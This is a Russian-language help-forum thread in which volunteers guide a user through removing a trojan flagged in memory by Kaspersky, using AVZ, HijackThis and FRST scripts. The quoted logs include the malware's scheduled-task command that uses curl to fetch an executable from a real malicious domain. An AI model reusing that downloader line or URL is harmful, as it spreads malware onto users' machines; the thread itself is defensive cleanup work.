Перейти к содержанию

Trojan.Multi.GenAutorunTask.c в системной памяти


Рекомендуемые сообщения

Здравствуйте, Kaspersky Endpoint Security 11 при каждом запуске системы находит вирус Trojan.multi.genautoruntask.c в системной памяти, при попытке устранить угрозу Касперский пишет что 1 объект не обработан. Лог с утилиты AVZ прилагаю, заранее спасибо

avz_log.txt

Ссылка на сообщение
Поделиться на другие сайты

Файл Hosts правили самостоятельно?

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 QuarantineFileF('c:\users\администратор\appdata\roaming\curl', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 ,0);
 QuarantineFile('C:\Windows\Fonts\Mysql\svchost.exe', '');
 QuarantineFile('C:\Users\Администратор\AppData\Roaming\curl\curl.exe', '');
 QuarantineFile('C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe', '');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Администратор\AppData\Roaming\curl\curl.exe"', '32');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\curl\curl.exe', '32');
 DeleteFile('C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe', '32');
 DeleteFileMask('c:\users\администратор\appdata\roaming\curl', '*', true);
 DeleteSchedulerTask('curl.quarantined');
 DeleteSchedulerTask('curls.quarantined');
 DeleteDirectory('c:\users\администратор\appdata\roaming\curl');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

 

Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.

Полученный архив quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

 

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

O22 - Task: (damaged) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser - C:\Windows\system32\CompatTelRunner.exe (Microsoft) (user missing)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{077474CB-DA6A-4E14-B6A9-341EF37FFD66} - \Update S1-8-22 (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{077474CB-DA6A-4E14-B6A9-341EF37FFD66} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1845DCCB-BDFF-4505-AA9C-8832A71E5272} - \Opera scheduled Autoupdate 1513753951 (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2F7BB325-9C0A-4CF6-8BDA-C207F52F596F} - \One Drive Update (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2F7BB325-9C0A-4CF6-8BDA-C207F52F596F} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3A3CA751-82FC-408C-8BC4-146686D1A61C} - \ZaxarGameBrowserz (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88EED5FC-F20A-4576-8EAB-7BB5C9FC7647} - \nvfontcache (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88EED5FC-F20A-4576-8EAB-7BB5C9FC7647} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{91C3A511-4FC9-4B54-9487-65A0ED9DC6D4} - \curl (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{91C3A511-4FC9-4B54-9487-65A0ED9DC6D4} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9DE96F17-EC17-45E4-8F73-0A669AB3620D} - \GoogleUpdate_Task_Core (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B87A35B3-F913-4D71-AC10-AECB5E9564B6} - \curls (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B87A35B3-F913-4D71-AC10-AECB5E9564B6} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B9B6770E-F99B-4FA0-BD0D-2C0F0FD70E45} - \GoogleUpdate_Task_Machine (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CB033D7D-7D93-4542-8D42-B6C9194CEFE9} - \DuckGo Task (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CB033D7D-7D93-4542-8D42-B6C9194CEFE9} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFB0A9F3-BCE4-4F84-A97E-B40E83A30A59} - \OnePlus Drive Update (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFB0A9F3-BCE4-4F84-A97E-B40E83A30A59} (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WPD (empty)
O22 - Task: curl.quarantined - C:\Users\Администратор\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Администратор\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task: curls.quarantined - C:\Users\Администратор\AppData\Roaming\curl\curl.exe (file missing)

 

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".

Ссылка на сообщение
Поделиться на другие сайты

Результат загрузки:

Sergey_IT, Ваш карантин отправлен, спасибо!

Имя карантин-а(ов) сообщите в теме:
2021.11.19_quarantine_de95fbc0c2ec83b5050ec09d90fef25f.zip
Ссылка на сообщение
Поделиться на другие сайты

Дополнительно:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Ссылка на сообщение
Поделиться на другие сайты
1 час назад, Sandor сказал:

Файл Hosts правили самостоятельно?

Не ответили.

 

Сообщите также самостоятельно ли ставили программу?

Цитата

Chromium-Gost

 

Ссылка на сообщение
Поделиться на другие сайты

Hosts правил, необходимо было его отредактировать для работы в тот момент когда рабочая станция находилась раннее в домене.

Chromium-Gost так же устанавливал сам.

Ссылка на сообщение
Поделиться на другие сайты

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Start::
    SystemRestore: On
    CreateRestorePoint:
    HKU\S-1-5-21-3800301354-2339470603-2501348306-1000\...\MountPoints2: {7152c183-07d3-11e7-8ee1-806e6f6e6963} - D:\ShelExec.exe open.htm
    GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
    GroupPolicy\User: Ограничение ? <==== ВНИМАНИЕ
    Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
    Policies: C:\Users\OtepovaNV\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
    Policies: C:\Users\Администратор\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
    U3 aswbdisk; отсутствует ImagePath
    2021-11-18 15:08 - 2020-03-04 10:23 - 000000000 __SHD C:\AdwCleaner
    AlternateDataStreams: C:\ProgramData\TEMP:E965A533 [129]
    FirewallRules: [{CABC3625-F663-4B5E-A80F-340729CFD55B}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe => Нет файла
    FirewallRules: [{96A891F5-CBCF-48A7-8410-3C9DFF98F47E}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe => Нет файла
    FirewallRules: [{47C59CAE-394B-4755-A04A-F2928CD7DBFA}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe => Нет файла
    FirewallRules: [{DBB8EFF7-66D7-446C-9215-572DE771C34F}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe => Нет файла
    FirewallRules: [{125E7D45-4FFE-4A8E-8D8D-30E4A9402992}] => (Allow) C:\Users\Администратор\AppData\Roaming\uTorrent\uTorrent.exe => Нет файла
    FirewallRules: [{E4C7ED3D-8220-4B12-A4A4-110A30FC0324}] => (Allow) C:\Users\Администратор\AppData\Roaming\uTorrent\uTorrent.exe => Нет файла
    EmptyTemp:
    Reboot:
    End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Похожий контент

    • Yonavi
      От Yonavi
      Сообщение от модератора Mark D. Pearlstone Внимательно читайте правила раздела! Евгений Касперский не помогает вылечиться от вирусов и не оказывает помощь по продуктам.
    • Xsiw
      От Xsiw
      Здравствуйте
      При проверке компьютера, KVRT ругается на mem:trojan.win64.generic.mem. Расположение: системная память. Лечение с перезагрузкой, либо без нее, вирус удаляет, но через какое то время всё возвращается, и при новой проверке снова ругается на этот же троян.
      CollectionLog-2021.11.26-11.49.zip
    • vetal747
      От vetal747
      Добрый день!
      Kaspersky регулярно обнаруживает вредоносный обьект, полная проверка не помогает:
      Описание результата: Обнаружено
      Тип: Троянская программа
      Название: HEUR:Trojan.Script.Generic
      Объект: http://pgold.pro/code\1054.js
      Причина: Экспертный анализ
       
      CollectionLog-2021.11.26-09.55.zip
    • Кеша
      От Кеша
      Недавно в диспетчере задач появились два новых процесса: WindowsInternal.ComposableShell.Experiences.TextInput.Inp и TiWorker.exe. В гугле нашёл несколько случаев, когда эти файлы описывались как  майнер, поэтому решил проверить и попросить о помощи.
      CollectionLog-2021.11.22-20.33.zip
    • pleco
      От pleco
      Добрый день участники форума.
      У меня после загрузки компьютера часто возникает сообщение от Касперского о трояне в системной памяти. Нажимаю "Лечить с перезагрузкой", Касперский лечит, комп перезагружается, и снова всплывает это же предупреждение.  Как-то связать время, когда впервые появилось это предупреждение, с какими-то событиями на компьютере (установка программ, обновлений и т.п.) я не могу.
      Проверка Kaspersky Virus Removal Tool, DrWeb CureIt и Malwarebytes ничего не дала. 
       
      Антивирус: Kaspersky Internet Security
      ОС: Windows 10
       
      Ругается на  MEM:Trojan.Win64.Generic.mem
      CollectionLog-2021.11.22-14.27.zip
×
×
  • Создать...